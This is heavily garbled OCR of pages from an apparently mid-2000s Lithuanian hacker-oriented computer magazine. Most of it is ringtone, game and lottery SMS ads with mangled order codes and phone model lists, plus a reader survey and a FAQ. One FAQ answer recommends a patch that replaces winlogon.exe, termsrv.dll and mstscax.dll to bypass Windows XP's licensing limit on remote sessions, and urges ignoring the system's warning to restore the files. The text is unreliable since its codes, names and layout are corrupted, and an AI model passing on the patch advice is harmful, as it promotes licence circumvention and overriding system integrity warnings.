Žinutę su spalvoto atviruko kodu nusiųskite į numerį 1323. Gaukite žinutę su nuoroda, iš kurios atsidarykite spalvotą atviruką 
NOKIA 2650. 3100. 3200, 3220, 3300, 35104 5100. 5140. 6020, 6021. 6030, 6100. 6170, 6230. 6280, 6600. 6610. 6610. 6800, T210. T250, 7250, 7260, 7270, 160, 7650 
SIEMENS A60, ABS, A75, AX75 060, CF75, MS5, MOBO, C65. 565. SL55, SL65 SONY ERICSSON 300), K300, 700. T610. T630, WB00 

SAMSUNG C200, C210, C230, D500 X120, X140, X200, X450. X480, X480, X600, X520, XB40, E300. E330, E630, E700, E710, E730. E760. E800, E820, 2510 


mur 
LOGOTIPAI 


207569660 


"Vi ka busi „ 


ATVIRUKAI 


188159650 AE 


NN, 
208129660 


207429660 188169660 
e NS 1 7 
TES: Psigs  tendans D. 22859660. | 207449660 | 183709660 
188068660 133809680 '207409660  100439660 "2 2 6. 29 
AST KIETAS BIOS mmm Giassid 5 o ku ašiks 4 
73239660 65648660 207339660 63079660 207509860 180689660 207468660 
GERAS SA DA rs LI 
41319660 27458660 27239660 24439660 Viską matau! 
207459660 177459660 174409660 
SIUNTINUKAS E EB I LOVR 
DRAUGUI 2 84 basketbal! 
D Išsirink paslaugą (išskyrus logotipus) k 1742198680 172779660 171208660 
| Po kodo palik tarpa ir įrašyk draugo telefono 
| numerį (pvz., 1709660 XXOOXXXXX). kV NN cu L 
| [2 Perskaityk pasirinktos paslaugos instrukciją V = : MELI sea 
| Įsitikink, ar ji tinka draugo telefonui NN S ž0828660 158569660 158529660 
-- — 


A "r 
Žinutę su kodu nusiųskite | mūsų numerį 1322. SIEMENS telefonams prie kodo pridėkite raidę S (pvz., 3689660s). 
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206689660 


Jurga: Nebijok 184559660 


Mėsa: 12 patiekalų 207679660 
Policijos patrulis: 7-tas kviečia Centrą 143339660 
Mėsa: Šeši nebūsiu 207669660 
Atiduok kaukuolę! 206678680 
Lėktuve: Atsipalaiduo jam... gelbėkit! 167708660 
Crazy Frog: Axel F 165229660 
James Brown: I Feel Good 120238660 


Skambutis iš morgo „UALU 208609660 -* 


Įsitikinkite, kad telefone įjungta GPRS. Ši paslauga galima Omnitel, 
Bitės GSM ir Tele2 klientams, išskyrus PILDYK ir MAŽYLIO vartotojus. 


Nusiųskite žinutę su vokalinės melodijos kodu į numerį 1318 

SAMSUNG C100. C200, C210. C230, 0500, X100 X120, X140 X200, X450 X460 XaBO X60O XC E300) 
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Rasa: Saulala nusilaida 205089660 205089660p | 
Mango: Sniegena NAUJA | 210649660  2106498660p 
Yu-Gi-Oh: You're Not Me 126849660 , 126848660p * 
Depeche Mode: Benind the Wheel 207179660 207179660p 
Simpsonai 3679660 3679660p + 
Mėsa: 12 patiekalų a 207708660 207708660p 
X-mode: Animals 156729660 168729660p “ 
Iš k.f. „Haris Poteris" 146719660 146719680p 
Crazy Frog: Popcorn 186419660 186419860p 
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Crazy Frog: 1001 night 205049660 205049660p 
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Vudis: Kalp du kart du 1766598660 176659660p 
Jurga: Nebijok 186389660 186389660p 
Mino ir Vilija: Vivo Per Lei 181639660 181639660p 
69 Danguje: 9 Dangui NAUJA | 210629660 | 210628660p 
Madonna: Hung Up 181449660  1814488660p 
Kelly Clarkson: Because Of You 206778660 206779660p 
Yva: Paukštelis 156849660 | 156849660p 
Mėsa: Šeši nebūsiu 5] 207689660 207689660p 
Vudis: Žodžiai 2106386860 | 210638680p 
Žilvinas Žvagulis: Faina 151279660 | 151279660p 
James Biunt: You're Beautijui 168359660 168359660p 
Milana: Mylėk karštai 210619660 210619660p 
Kylie Minogue: I Believe In You 133279660 133279860p 
Juanes: La Camisa Negra 176239660 176239660p 
Amberlife: Day Or Night NAUJA | 210469660 210469680p 
Vanilia Ninja: I Know 152788660 152788660p 
Bomfunk MC's: Freestylor 3688660 3689660p | 
Andrius: Nesek sau rožės prie kasų 181609660 181609660p | 
Vilija: Tu kvaliys 191659660 181669660p —+ 
= ama | 
Į 
ai kad telefone įjungta GPRS. Netinka PILDYK Ir MAŽYLIO vartotojams. į 
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NOKIA 2650, 3100, 3200, 3220, 3300. 3510, 3510, 3650 5100, 5140, 6020, 6021, 6030. 6106. 6170 
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PRIEŠ UŽDUODAMAS KLAUSIMĄ 
PAGALVOK! MAN NEVERTA SIŲSTI 
KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIRTAS 
„HACK-FAG“, TAIP PAT NEVERTA 
UŽDAVINĖTI AKIVAIZDŽIAI LAME- 
RIŠKŲ KLAUSIMŲ, ATSAKYMUS Į 
KURIUOS BENT KIEK NORĖDAMAS 
GALI RASTI IR PATS. AŠ NE TELE- 
PATAS, TODĖL KONKRETIZUOK 
KLAUSIMĄ IR ATSIŲSK KUO 
DAUGIAU INFORMACIJOS. 


O: Kokias pasiūlytumei /Psec realizacijas, kurių serve- 

rinė dalis veiktų Linux sistemoje? Populiarusis OpenVPN 

su SSL tinklo srauto šifravimu manęs dėl tam tikrų 
priežasčių netenkina. 


A: Priminsiu, kad IPsec (IP Security) tai apsaugotas 
IP protokolas, kurio vienas iš principų yra nenutrūks- 
tantis tinklo srauto šifravimas. Konkrečių Linux siste- 
mai skirtų realizacijų ne tiek jau ir daug, galiu išskirti /p- 
sec-Tools (ipsec-tools.sourceforge.net) — tai Linux sis- 
temai su 2.6 branduoliu skirto autoritetingo KAME'S IP- 
Sec įrankių paketo jungtis. Taip pat gali būti įdiegtas 
NetBSD ir FreeBSD sistemose. 
Openswan (www.openswan.org) IPsec realizacija, skir- 
ta Linuxui su 2.0, 2.2, 2.4 ir 2.6 branduoliais. Čia konfi- 
gūracijos metu be rimtos dokumentacijos (Www.natecarl- 
son.com/linux/ipsecl2tp.php) neapsieisi. Tačiau kai visa 
tai sukonfigūruosi, užmegsi ryšį ir su sniferiu patikrinsi 
šifravimo kokybę, tuomet pagalvosi: „Kaip gi aš anksčiau 
be jo galėjau apseiti?!“. 


() O: Vaikinai iš „Microsoft“ apribojo Windows XP kaip ter- 


minalų serverio darbą tik vienu vartotoju. Ar yra koks nors 
būdas, leidžiantis prie šios sistemos jungtis iš karto ke- 

letui nutolusių vartotojų, ar tokiu atveju vienintelė išeitis — 
pasirinkti serverinę Windows versiją? 


A: Iš tiesų įmanoma priversti Windows XP veikti kaip 
terminalų serverį: sistema visiškai sėkmingai priims di- 


delio vartotojų kiekio prisijungimus, praktiškai taip pat, 
kaip ir Windows 2000/2003 serveris. Tam reikia nedidelio 
pataisymo, kuris vadinasi TSFree. http://free.pages.at/an- 
tiwpa/Other/TerminalserverNoRestrPatch--1-1 svetainėje tu 
gali rasti tiek patį pataisymą, tiek ir jo išeities tekstus. Vos 
tik TSFree padarys savo darbą, Windows pradės garsiai rėkti 
apie tai, jog sisteminės bylos buvo pakeistos ir jas skubos 
tvarka būtina grąžinti į pradinę būklę. Nesutik! Pataisymas 
pakeičia winlogon.exe, termsrv.dll ir mstscax.dll, taip pa- 
šalindamas langinių apribojimus. 
Dabar, kai sistema išlaisvinta iš apribojimų, galima pridėti 
naują vartotoją ir įtraukti jį į „Remote Desktop Users“ gru- 
pę. Tai daroma vartotojo savybių (Properties) lange, iki ku- 
rio galima nukeliauti taip: Start -> Programs -> Administ- 
ration -> Computer Management -> System Tools -> 
Local Users and Groups -> Users. Norint pašalinti vienu 
metu besijungiančių vartotojų kiekio apribojimus, koman- 
dinėje eilutėje surink gpedit.msc. Turėtų pasirodyti „Group 
Policy“ langas. Čia pasirink Computer Configuration -> Ad- 
ministrative Templates -> Windows Components -> Ter 
minal Services -> Limit number of connections. Pasiro- 
džiusiame lange išsirink „Enabled“, o lauke „TS Maximum 
Connections allowed“ įvesk magiškąjį skaičių 999999, Vis- 
kas. 
Taip pat egzistuoja speciali programa WinConnect Server 
XP (www.ef1.ru), kuri kompiuteriui su Windows XP sistema 
suteikia galimybę vienu metu užmegzti iki 21 nuotolinio 
prisijungimo seanso. Išsamiau apie tai gali paskaityti ofi- 
cialioje programos svetainėje. 
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Elitinio 


HAKERIŲ KLUBO 


Interneto klube „IMPRESS“ 
su ELITE CLUB nario kortele 
suteikiama 20 3 nuolaida! 


Hi | 


MEMPPRESS 


Kaunas, Savanorių pr. 255, 


(HYPER MAXIMA) 


Pateikus ELITE CLUB 
kortelę visose BMS 
parduotuvėse suteikiama 
5 96 nuolaida. 


ELITE CLUB 
*004A915b 


HAKERIŲ "KLUBAS 


Kaunas 

Savanorių pr. 66 

Tel.: (37) 75 10 10 

El. paštas: kaunas(Obms.lt 


BMS MEGAPOLIS, 

Savanorių pr.301 

Tel.: (37) 313101 

El. paštas: megapolis(Obms.lt 


viuiunius 

BMS MEGAPOLIS, 

Laisvės pr. 2 

Tel.: (5) 24 77 300 

El. paštas: v.megapolis(Obms.lt 


Klaipėda 

Minijos g. 2 

Tel.: (46) 38 33 33 

El. paštas: klaipeda(Obms.lt 


Vardas! 
Pavardė 
Amžius | 
Adresas | E 


|| 


El.paštas | 


Išvardink tris, tavo manymu, 
įdomiausius šio numerio straipsnius: 
a 


ir tris prasčiausius: | 


Kitame numeryje norėčiau rasti: 


Tavo klausimas į FAO: 


2 


p.d. 22. 


34, LT 


44012 


KAUNAS 


Naudojiesi kompiuteriu 
| | metus 
Naudojiesi internetu 

| 1 metus 


Kiek žurnalo numerių skaitei? 
+ numerius 


Kokią OS naudoji? 
Reo————— 


33-0J0 NUMERIO 
NUGALĖTOJAS: 


ARVYDAS GUDAITIS 


IŠ KLAIPĖDOS. 

JAM ATITENKA 

MICROSOFT WIRELESS 
OPTICAL KLAVIATŪRA IR PELĖ 


LAIMĖTOJO PRAŠOM 
PASKAMBINTI Į REDAKCIJĄ IR 
SUSITARTI DĖL PRIZO 
ATSIĖMIMO. 


Rašyk SMS: EXEI ALIEN 
Siųsk numeriu 1321, kaina 2Lt 


Spalvoti paveiksliukai 


ROBBIE WILLIAMS 

TRPPING trippinght 
ADVERTISING SPACE advertising 
SUPREME Supreme 


SUGABABES 

PUSH THE BUTTON pushtheht 
UGLY ugy 
CAUGHT IN THE MOMENT | caughtin 


Monotoninės melodijos 
rašyk SMS: EXEM AXEL 


rašyk SMS: EXEP AXEL 
MELODIJOS Siųsk numeriu 1321, Siemens telefonams: exems axel 


kaina 2Lt Siųsk numeriu 1321, kaina 2 Lt 


POPULIARIOS MELODIJOS kodas Į NAUJOS MELODIJOS kodas 


Sugababes / Push The Button pushtheht Bob Sinclair / Love Generation 

Crazy Frog / Pump Up The Jam pumpupthe B. W.0./ Sunshine In The Rain ma 
The Bloodhound Gang / FU CK tuokthų Alanis Morrisette / Crazy crazy 
Benassi Bros ft. Dhany / Every Single Day everysiną Cascada How Do You Do Nene 
Blue Lagoon / Heartbreaker heartbreaker Window Shoppe W 

Gwen Stefani / Cool coolos Coldplay Taik 

Sheryl Crow / Good Is Good goodisgood | Depache Mode / Precious 
Naujieji Lietuviai / Afigienai afigienai | Milary Duff / Wake Up 

Black Eyed Peas / My Humos myhumpsht James Blunt / Goodbye My Lover 
TAT.U. / All About Us aliaboutu  J.Simpson / These Boots Are Mad 
Akon / Belly Dancer beltydancet = Eminem / When I'm Gone 

Sean Paul / We Be Burnin' webebur | Mattafix / Big City Life 

Black Eyed Peas / Don't Lie dontiia Korn / Twisted Transistor 

Crazy Frog remix axei Kanye West / Gold Digger golddigą 
Shakira / La Tortura latortura Pussycat Dolts / Stickwitu stickwituht 
Jamės Blunt / You're Beautiful youre Rammstein / Benzin benzin 
Arash / Boro, Boro boroboro Sean Paul / Ever Blazin' everblazinakum 
Prodigy / Voodoo Peor ioopedo September / Looking For Love lookingtor 
ATB / Ecstasy ecsta Shakira / Don't Bother dontbother 
Daddy Yankee / Gasolina gasolina Simon Webbe / No Worries noworries 
Arash / Temptations tempta  Starstytarz / Keep On Moving keeponmoving 
ATB / 9 PM (Til I Come) 9pmtilli - Sugababes / Ugiy ugiy 
Kelly Clarkson / Since U Been Gone sinceubee The Rasmus / Sali Away ailaway 
Fo Pustyosi Das Don't Čha dontcha Westlife / You Raise Me Up youraiseht 
d utta vuttacont Depeche Mode / A Pain That "m Used To apainthatim 
wetouch Kelly Clarkson / Because Of You becauseotakum 
haveanice Dustin with Chris / Patricia The Stripper patriciaht 
Michasi Buble / Save The Last Dance lastdance Rihanna / I Its Lovin“ Thai You Want iftslovinakum 
Britney Spears / Someday ( WA Understandį somedb HIM / Wings Of A Buttertty wingsota 


TV / FILMŲ HITAI kodas Į ŠAUNIOS MELODIJOS kodas 


James Bond Theme Jamesbond Britney Spears / Do Something dosomethi 
Duran Duran / A View To A Kill viewtoakili 50 Cent / In Da Ciub Indaciub 
Giadys Knight / License To Kill Iicancetoki! South Park / Uncle Fucka unciefuc 
Tina Turner / Goldeneye goldeneye 50 Cent / PIMF pimp 
Garbage / The World Is Not Enough workdisn Backstreet Boys / Incompiete incomple 
Madonna / Die Another Day dieanother Chemical Brothers / Galvanize galvanize 
Maištingas Angelas angelrebeidė Tina Tumer / Goldeneye goldeneye 
The Nanny nany Rammstein / Amerika amerika 
Baywatch baywatch  Gunther / Ding Dong Song dingdong 
Monk monk  Alcazar / Physical physical 


Polifoninės melodijos: 


talkcoldpiey 
precious 
wakauphdhi 
goodbyelover 
thesebootsht 
whenimgone 
bigcitylife 
twistedtrans 


Cascada / Everybma V Touch 
Bon Jovi / Have A Nice Day 


CS t: Britney Spears / Everytime everyt 


Misija: Neįmanoma mission 
Das 8001 
in 


Rhianna / Pon De Repiay ponderep 
Robbie Williams / Radio radio 
Christina Aguliera / Dirty dirrty 


Block Mobile 
Monster GP 


Siųsk sms Siųsk sms 


1 TOS Prodigy / Smack My Bitch Up smackmybit 
Vedęs ir turi vaikų loveandm S Club 7 / Reach reach 
Brėmeno muzikantai pesenkabr | The Prodigy / Giris giris 
Seksas ir miestas sexandiheci Green Day / Waka Me Up When September Ends wakeme ex! block 

egame mobilegp 

Krokodilo Genas daineiė genajapots | Duran Duran / A View To A Kil viewtoakil "m 
Žvaigždžių karai starwars Jay-Z 8. Linkin Park / Numb/Encore numbenco M | Motorola V180, V220, V3, V300, V500 8 Ka 
X-Files xfiles Benassi Bros feat. nap Iie vad Heart hitmyhea | V525, V550, V600, VB0, A1000, A830 
Žavūs ir drąsūs boldand kin Park / Breaking The ab AB36 CB o Ceso E1004 E398 a3 Nokia | 3200. 3510, 
Kili Bill / Twisted Nerve twisted Ruslana / Wild Dances wilddances beer M pi k des | 
Nancy Sinatra / Bang Bang bangbang Opus / Life Is Life IHteiskfe 6230, 6260. La 0 8620, 6630, 6670 6610. 7240. 7280 
' ' 6800. 6810 200. 7210, 7250, 72601 72501, 1650. N-gage. | 
Genų via 2 pa il BS Luką 7600, 7610, 7650, 89101. Ngage, Ngagė Ša N-gago OO Samauną 
Na palauk nupogodi | Ushar / Yeah yeah Od Lg U8110, U8120, U8130. UB138 Nokia 3100. 3300, 3650, 3660 2880 E700. X100. Siemens 
Ratuotas Riteris knightri Blue Lagoon / Do You Reaily Want To Hurt Me doyourea 6100 
Rožinė Pantera pinkpant The Game / 50 Cant / How We Do howwedo 


Panasonk XBI E100, E106 1 D 10 00 Č C80, M5A. MC60,555 
E330e700, E710. E715. E800, P400, P510 a Šo Ši i 7280 22 3 - Si55 | Sonyericsson 
Finstounai fintsto The Offspring / Self Esteem selfesteem 
Batmanas batman  Novaspace / So Lonely solonaly 


7650 N-GageSL65. sx1 8810 Pe00. PO, T610 
ROKAS MELODIJOS kodas HDANCE / TECHNO 


| SonyEricsson F500, K700, 1610 7250 Z800 Motorola: V300 
To16 T630, 2600 Geg Ka A Sharp 
Foo Fighters / Ali My Life alimytife  Tomcraft / Loneliness 
Avril Lavigne / Nobody's Home nobodyshom  TAT.U. / Ne Ver, Ne Bojsiar 

reen Day / American Idiot AmeriCai Aicazar / Not A Sinner Nor A Saint 
U2 / Vertigo vertigo Agua / Barbie Girl 
Metallica / Hero Of The Day herooftheday yao / One a In Bangkok 
AC/DC / TNT nt Not Gonni 
U2 / Beautifui Day bday Šonigue / Alive 
Red Hot Chilli Peppers / Give It Away giveitaway | Bioodhound Gang / The Bad Touch Mona „Va, - p 
Metallica / Nothing Else Matters nothinge Roger Sanchez / Another Chance Moorea gano Kon va M Voeai 26104, a680, 3880, BT1O, 5140 
Red Hot Chili Peppers / Californication califomic Paul Van Dyk / For An Angel 3100, 3200. 3300, 3510 3850, 3680 6100. 6200 J. 8230, 6260. | | 
Robbie Wiliams / Supreme supveme | Benny Benassi / Satisfaction 6600. 6810 6800, 6810, | 


satistaction | 5100. 5140, 6100. 6220, 6230, 6600. 6610. | 
„Ą | 4 + 6820, 7200 7250, 72508, 3100. 3200 
Lenny Kravitz / Fly Away yaway | ATC / "m in Heaven (When You Kiss Me) Iminheaven Į | 9530, 3800, 6810-0820 7200.7210. 7280. || 7600-7610, 6010, N-Gage, N-Gage || Nokia 3100. 3200 || Nšdy  aė10 3880 
The Rasmus / First Day Of My Lite firsiday Cascada / Miracie cascada 00. Samsung D500, E700. E710 EB10 00 Samsung E700, E710, E800 300, 3660, 3860 1660. 5100, 6100 
Depeche Moda / Enjoy The Silence enjoythe Lou Bega / Mambo No.5 x100, X600, Sharp GAI. GX20 ' r 6200, 6220. 6610 
Red Hot Chili Pappers / Road Trippin roadtrippi  Alcazar / This Is The Worid We Live In 


mambonoS Es20, 7400. bara GKiC, GL SOL GX30. Siemens 85, CX65. 585 0 ) 
Siemens C68, C M6s 5. 565 B 6800. 710. 7250 
thisisthe a C00, GMA, DG, a86, B05, 20 SL85, SX1. SonyErosson FB00 210. 7250, 7250 250, 7850, N-gage 

Deep Purple / Smoke On The Water smokeonw 2 Unlimited / Get Ready For This 
Evanescence / Bring Me To Life daredevi = Michas! Gray / The Weekend 


Manager 


Siųsk sms 
exegame socCcermanager 


Robots 


Siųsk sms. 


Hudson 
Blade 


Siųsk sms 
exegame hudson 


Kung Fu 
Fighting 
5 Siųsk a 


į 0. T 
getreadytor o ia Dainis K700, T610. T616, T630, Z800 N-gage OD 
theweekend 


Jopti Gera teikiamų paslaugų kotybę. — "gavo užsakyto turinio J jo — A eisi) kreipkitės Į mus el para adresu Įpoiūiippi K ir mes Jums padėsime 
ai JAVA žaidima » 5 linka OMNIT s „Ma: at J arų g R Nokis 3100, 3200. 3300, 3510. 35101, 3620, 365 
6100 6200, 6220 6230, 6600, 6610, 6650. 6800. 8810, 6820, 7210, 7250 72501, 7600 7650. Na Semen 5 A55 Č88 C60, C62 C65, CF82 CX6S M55, MC80, S55, SL55. ST 1. M C350, T720, T720i V180,4 
A PS00, T300, T310, T610, T630, Z200, 2600. r Aps E100, E400, E700, N620, P100, P400, 5100, 5200, S300M, 5500, T100, T400, T500, V200, X100, X400, X600. Sharp GX 20. LG 61610, T5100, L1100, 61800, G56 65500, 
Boakdti F2100. Monofoninės Nokia: 3210, 3310, 3330, 3410, 5210, 5510, 6110, 6130, 6150, 6210, 6250, 6310. 6510,6610.7110, 7210, 7650, 81101, 8210, 8250, 8310, 8810. 8850, 5890. 8910 ja 9210 
eiksliukai: Nokia 3100, 3200, 3300, 3510i. 3820, 3650, 3660, 5100, 5140, 6100, 6200, 6220, 6230, 6600, 6610, 6850, 6800, 6810, 6820, 7210, 7250, 72501, 7650, NGage Siemens C60, C62, CB5, CF62, CX65, M55, MC60, SX! 555 
spa i ) Sony-Ercsson T300, T310, T610, T630, Z600 Motorola C350, T720, T720i, V180, V220. LG G5220C 


BT- Geras.com 


(BlNnTĖ) 


(flobLili 
Ioteorija 


Išskyrus TELEZ 


BILIETO KAINA 1 Lt + sms siuntimo kaina O,20 Lt 


Rašyk SMS: OHO ir 3 skaičius iš 12 (pvz: on10 2 11 8) 
siųsk SMS 1606 ir netrukus gausi Ioterijos bilietą. 


www.oholotto.lt Bėgimas vyksta kasdien 21:25 per BTV 


